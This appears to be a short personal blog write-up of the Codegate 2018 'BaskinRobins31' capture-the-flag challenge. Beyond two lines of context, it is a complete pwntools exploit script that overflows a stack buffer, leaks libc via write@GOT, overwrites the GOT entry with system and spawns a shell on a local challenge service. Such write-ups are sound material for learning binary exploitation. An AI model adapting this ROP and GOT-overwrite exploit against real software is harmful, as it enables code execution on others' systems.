고졸백수해킹일기
codegate2018 BaskinRobins31

A challenge I solved after it was recommended to me.

The binary crashes in the your_turn function.

file : http://web.noe.systems/binary/Baskinrobins31

The payload is below.
```python
# Python 2 / pwntools exploit script as posted (str-based payload building)
from pwn import *

prob = ELF('./BaskinRobins31')
#print prob.symbols['read']
s = remote("localhost", 7777)

# 1 + 183 = 184 bytes: fills the 0xB0-byte buffer plus the saved rbp,
# so the following qwords land on the saved return address
dummy = "1" + "A"*183  #0xB0
write_plt = 0x4006d0
write_got = 0x602028
read_plt = 0x400700
read_got = 0x602040
sh = "/bin/sh"
bss = 0x602090
gad = 0x40087a            # gadget that pops the three argument registers, then ret
payload = ""
offset_system = 0xa8e20   # write - system in the target's libc

print s.recvuntil("How many numbers do you want to take ? (1-3)")

payload += dummy
# write(1, write_got, 8): leak the runtime address of write from the GOT
payload += p64(gad)
payload += p64(1)
payload += p64(write_got)
payload += p64(8)
payload += p64(write_plt)
# read(0, bss, len(sh)): store "/bin/sh" in .bss
payload += p64(gad)
payload += p64(0)
payload += p64(bss)
payload += p64(len(sh))
payload += p64(read_plt)
# read(0, write_got, 8): overwrite write's GOT entry with the computed system address
payload += p64(gad)
payload += p64(0)
payload += p64(write_got)
payload += p64(8)
payload += p64(read_plt)
# single-argument gadget, then call through write@plt, which now resolves to system
payload += p64(0x00400bc3)
payload += p64(bss)
payload += p64(write_plt)
s.sendline(payload)

print s.recvuntil("\n")
print s.recvuntil("\n")
print s.recvuntil("\x00")
# the leaked pointer is 6 significant bytes; pad to 8 before unpacking
write = u64(s.recv(7) + "\x00")
system = write - offset_system

s.send(sh)            # consumed by the first read() in the chain
s.send(p64(system))   # consumed by the second read(), lands in write@got
s.interactive()
```